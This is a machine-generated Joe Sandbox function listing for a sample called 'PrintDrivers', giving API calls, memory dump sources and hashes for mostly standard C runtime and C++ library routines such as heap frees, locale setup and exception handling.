                                                                    • Instruction Fuzzy Hash: 2601F531A80B16AFDB211BF1AC4DE5A3EA9BBA1B01B041014BC00E7290EBF0C804DBA5
                                                                    Function 005BDFCE Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 005BE012
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD297
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2A9
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2BB
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2CD
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2DF
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD2F1
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD303
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD315
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD327
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD339
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD34B
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD35D
                                                                      • Part of subcall function 005BD27A: _free.LIBCMT ref: 005BD36F
                                                                    • _free.LIBCMT ref: 005BE007
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BE029
                                                                    • _free.LIBCMT ref: 005BE03E
                                                                    • _free.LIBCMT ref: 005BE049
                                                                    • _free.LIBCMT ref: 005BE06B
                                                                    • _free.LIBCMT ref: 005BE07E
                                                                    • _free.LIBCMT ref: 005BE08C
                                                                    • _free.LIBCMT ref: 005BE097
                                                                    • _free.LIBCMT ref: 005BE0CF
                                                                    • _free.LIBCMT ref: 005BE0D6
                                                                    • _free.LIBCMT ref: 005BE0F3
                                                                    • _free.LIBCMT ref: 005BE10B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: 34b6cce3702b0ba5d49d0d070566cdeeba2922134e0eca24fc41bb3483e78f14
                                                                    • Instruction ID: 0696d5443f037c314788971cd645e30db119620be70a2466c8c008c6b313f743
                                                                    • Opcode Fuzzy Hash: 34b6cce3702b0ba5d49d0d070566cdeeba2922134e0eca24fc41bb3483e78f14
                                                                    • Instruction Fuzzy Hash: EA314F355006099FEB30AA78D84ABDABBE9BF50350F584929E459DB151DFB9FC40CB10
                                                                    Function 005BD378 Relevance: 18.4, APIs: 12, Instructions: 373COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: bdf19d87500df6fede75ef0652c857ecd19eab40fadc331f28921d0103987881
                                                                    • Instruction ID: 119407feeb2d7abaa58e8e8fe7ab5ed041131105fc91476a108a78c5b2ec7eea
                                                                    • Opcode Fuzzy Hash: bdf19d87500df6fede75ef0652c857ecd19eab40fadc331f28921d0103987881
                                                                    • Instruction Fuzzy Hash: 37C12675D40205AFEB20DB98CC47FDEBBF8BB48700F144565FA05EB282E6B4A94187A4
                                                                    Function 005A80B3 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 005A81AE
                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005A81D5
                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005A82E1
                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 005A83BC
                                                                    • _UnwindNestedFrames.LIBCMT ref: 005A8443
                                                                    • CallUnexpected.LIBVCRUNTIME ref: 005A845E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                    • String ID: csm$csm$csm
                                                                    • API String ID: 2123188842-393685449
                                                                    • Opcode ID: b9fc11d09e818130cd4829fbe6661f2e496da3b0c08bd848191c4be171abc1a1
                                                                    • Instruction ID: fa756dffc537607cb1ebb025e6a1b860b9825a659b62c1d681309e6a8796ee54
                                                                    • Opcode Fuzzy Hash: b9fc11d09e818130cd4829fbe6661f2e496da3b0c08bd848191c4be171abc1a1
                                                                    • Instruction Fuzzy Hash: 70C1697180020AEFCF25DFA8C885ABEBFB5FF4A710F14455AE8116B252DB31DA51CB91
                                                                    Function 0059AD6D Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059AD74
                                                                    • _Maklocstr.LIBCPMT ref: 0059ADDD
                                                                    • _Maklocstr.LIBCPMT ref: 0059ADEF
                                                                    • _Maklocchr.LIBCPMT ref: 0059AE07
                                                                    • _Maklocchr.LIBCPMT ref: 0059AE17
                                                                    • _Getvals.LIBCPMT ref: 0059AE39
                                                                      • Part of subcall function 00595699: _Maklocchr.LIBCPMT ref: 005956C8
                                                                      • Part of subcall function 00595699: _Maklocchr.LIBCPMT ref: 005956DE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 3549167292-1778967338
                                                                    • Opcode ID: bf46e9516ce490a6bab91c5c11caf115b7f341b63d8d32cd1f5afa9cd95580fa
                                                                    • Instruction ID: 2f2c2e6af977d74151c4bcfaec0fae9deff8402af8b397b13225f760733a7205
                                                                    • Opcode Fuzzy Hash: bf46e9516ce490a6bab91c5c11caf115b7f341b63d8d32cd1f5afa9cd95580fa
                                                                    • Instruction Fuzzy Hash: 442181B1D00319AADF15EFA4D889ADE7FB8FF49710F10841AF9049F242EA708944CFA1
                                                                    Function 005845B0 Relevance: 15.1, APIs: 10, Instructions: 137timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,F3F544E4,?,?,00000002), ref: 00584612
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,F3F544E4,?,?,00000002), ref: 00584633
                                                                    • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584666
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584677
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584695
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846B1
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846D9
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 005846F5
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584713
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 0058472F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                    • String ID:
                                                                    • API String ID: 1711917922-0
                                                                    • Opcode ID: 0de8e7574411ad5178cc1c881991dcda0178c54a1594e38044622673a49445fc
                                                                    • Instruction ID: f9c1425cff6c7ab525284240257875b9c2c7c87734509fb261fa4ea0244d9476
                                                                    • Opcode Fuzzy Hash: 0de8e7574411ad5178cc1c881991dcda0178c54a1594e38044622673a49445fc
                                                                    • Instruction Fuzzy Hash: 20517770D01619ABDB20DF99D988BAEBFF4FB49714F20421AED10B7384D77459058FA8
                                                                    Function 005B6534 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 005B654A
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005B6556
                                                                    • _free.LIBCMT ref: 005B6561
                                                                    • _free.LIBCMT ref: 005B656C
                                                                    • _free.LIBCMT ref: 005B6577
                                                                    • _free.LIBCMT ref: 005B6582
                                                                    • _free.LIBCMT ref: 005B658D
                                                                    • _free.LIBCMT ref: 005B6598
                                                                    • _free.LIBCMT ref: 005B65A3
                                                                    • _free.LIBCMT ref: 005B65B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 7d481faac3348df9dc35e9589146c667b1e7456890488090ae2c45ef9bbcc6ac
                                                                    • Instruction ID: 584b1164b9895f9c131b8ccdb56360b072f7d3617e8048cd16185b931a0dc691
                                                                    • Opcode Fuzzy Hash: 7d481faac3348df9dc35e9589146c667b1e7456890488090ae2c45ef9bbcc6ac
                                                                    • Instruction Fuzzy Hash: AF21977A900109AFDB41EF94C885DDEBFB9BF48340F8045A6F515AF121DB39EA55CB80
                                                                    Function 0059DA57 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059DA5E
                                                                      • Part of subcall function 00595F15: __EH_prolog3.LIBCMT ref: 00595F1C
                                                                      • Part of subcall function 00595F15: std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 00595F15: std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1538362411-2891247106
                                                                    • Opcode ID: 765ea775684917bd1ba98907b0d440319a9d5a5d2051c14a1492cf7999e543c2
                                                                    • Instruction ID: f0bcf630a922c56b5223952128349d42c72913e019d4525737680696a2590777
                                                                    • Opcode Fuzzy Hash: 765ea775684917bd1ba98907b0d440319a9d5a5d2051c14a1492cf7999e543c2
                                                                    • Instruction Fuzzy Hash: 55A135B550020AAFDF05DF94CC86EEE7FBAFF48308F104819FA56A6291D7319921DB61
                                                                    Function 005A2B04 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 266COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A2B0B
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: 6820d69a2bced090828e2fea3b71c33caab1ef714004be78f8be2f1a572f2157
                                                                    • Instruction ID: f45600d45e18755bfeccc1ba266b70f27610fddd9d149efd77ee27aabdbc609c
                                                                    • Opcode Fuzzy Hash: 6820d69a2bced090828e2fea3b71c33caab1ef714004be78f8be2f1a572f2157
                                                                    • Instruction Fuzzy Hash: C3A1477150020AAFDF09DF88CC96EFE7FB9FF4A314F10441AFA46A6292D6319911DB61
                                                                    Function 00587BD0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00587C17
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00587C39
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00587C61
                                                                    • LocalAlloc.KERNEL32(00000040,00000044,00000000,F3F544E4,00000000,00000000), ref: 00587CB9
                                                                    • __Getctype.LIBCPMT ref: 00587D3B
                                                                    • std::_Facet_Register.LIBCPMT ref: 00587DA4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00587DCE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 2372200979-3454266309
                                                                    • Opcode ID: 49179456f8407aff766adabe7269e02524d73da75bdc3014167c7605c4d27f93
                                                                    • Instruction ID: f1c85ab3ee32f1ccbdcbdc70d7537df5b42c32d4fbf3975898d107025fa681ba
                                                                    • Opcode Fuzzy Hash: 49179456f8407aff766adabe7269e02524d73da75bdc3014167c7605c4d27f93
                                                                    • Instruction Fuzzy Hash: 2461B0B1D04649CFDB11DF68C984BAABBF0FF18310F248199D885AB291E770EE45CB91
                                                                    Function 00588830 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,00000000,F3F544E4,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00588902
                                                                    • __Getctype.LIBCPMT ref: 0058897D
                                                                    • std::_Facet_Register.LIBCPMT ref: 005889B8
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 2372200979-3454266309
                                                                    • Opcode ID: 07a34603e53d373a027715fd074cd6d42a532c501d28d547495620848ae50ada
                                                                    • Instruction ID: 9c535c9d68e69a9513b8f029b57704218bac55d8a62c40653107575c21df25dc
                                                                    • Opcode Fuzzy Hash: 07a34603e53d373a027715fd074cd6d42a532c501d28d547495620848ae50ada
                                                                    • Instruction Fuzzy Hash: AD519B71900249DFDB11DF98C848BAEBFF4FB54710F548599E885AB282DBB0AE45CF81
                                                                    Function 005BC71D Relevance: 13.7, APIs: 9, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free_wcschr
                                                                    • String ID:
                                                                    • API String ID: 3422831350-0
                                                                    • Opcode ID: e7b3b20bd1d7fb892cb48eae9b2ec3f11e8267ab4449dc657b986540ab96f720
                                                                    • Instruction ID: 50ab620e417697f474c4983b61a79a177024fcecbf29cac01fefee1a753667c4
                                                                    • Opcode Fuzzy Hash: e7b3b20bd1d7fb892cb48eae9b2ec3f11e8267ab4449dc657b986540ab96f720
                                                                    • Instruction Fuzzy Hash: E251E871D00712AFEB24AF68C886AEE7FE4FF45310B14456DFA55DB281EB34B9408B58
                                                                    Function 005BD797 Relevance: 13.7, APIs: 9, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 805adb2b3ff58edada5dcfec6b48ba5df84cb6302272f3822834b4f448075912
                                                                    • Instruction ID: aebc0069045c733778d11c9c96d1cf4d7087dfc975c4645bdef54474c42ecae2
                                                                    • Opcode Fuzzy Hash: 805adb2b3ff58edada5dcfec6b48ba5df84cb6302272f3822834b4f448075912
                                                                    • Instruction Fuzzy Hash: 5B6172759007059FEB20DF64D845BEABBF9FF44710F14456AE955EB242EB70BD008B60
                                                                    Function 005B58ED Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 255COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 005B664C: GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                      • Part of subcall function 005B664C: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                    • _free.LIBCMT ref: 005B5BD8
                                                                    • _free.LIBCMT ref: 005B5BF1
                                                                    • _free.LIBCMT ref: 005B5C2F
                                                                    • _free.LIBCMT ref: 005B5C38
                                                                    • _free.LIBCMT ref: 005B5C44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast
                                                                    • String ID: C$zK[
                                                                    • API String ID: 3291180501-1081286361
                                                                    • Opcode ID: 5d7a317d82ad16782ba2453c28bb84ac5a26ffe8b7964c770f8fd1abf03d8a62
                                                                    • Instruction ID: 7ad605e535239e602075470973eb50174b7290fe29dd2ea1584564061b91b7e1
                                                                    • Opcode Fuzzy Hash: 5d7a317d82ad16782ba2453c28bb84ac5a26ffe8b7964c770f8fd1abf03d8a62
                                                                    • Instruction Fuzzy Hash: 19B14B7590161A9FDB28DF18C888BE9BBB5FB48310F5445A9E84AA7251E730BE90CF40
                                                                    Function 005B5462 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 186COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 005B68F8: HeapAlloc.KERNEL32(00000000,00000001,00581AC0,?,005A5BEE,00581AC2,00581AC0,?,?,?,0058F95C,00581AC4,00581AC4), ref: 005B692A
                                                                    • _free.LIBCMT ref: 005B5571
                                                                    • _free.LIBCMT ref: 005B5588
                                                                    • _free.LIBCMT ref: 005B55A5
                                                                    • _free.LIBCMT ref: 005B55C0
                                                                    • _free.LIBCMT ref: 005B55D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$AllocHeap
                                                                    • String ID: (\$zK[
                                                                    • API String ID: 1835388192-2438518189
                                                                    • Opcode ID: 7603b477b3b11437dac7ea8b5f454874e0addbb2f7c2bbe3bdb7b40fcba1212e
                                                                    • Instruction ID: 57af451f559f46536eb97ad8a5119cb7b768be782b5bf185542702396da378d8
                                                                    • Opcode Fuzzy Hash: 7603b477b3b11437dac7ea8b5f454874e0addbb2f7c2bbe3bdb7b40fcba1212e
                                                                    • Instruction Fuzzy Hash: 5551A172A00B059FDB25DF69C842BAABBF5FF58721B540669E805DB290F735FA018B40
                                                                    Function 00583AC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 177libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00583580: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005835E5
                                                                      • Part of subcall function 00583580: _wcschr.LIBVCRUNTIME ref: 00583676
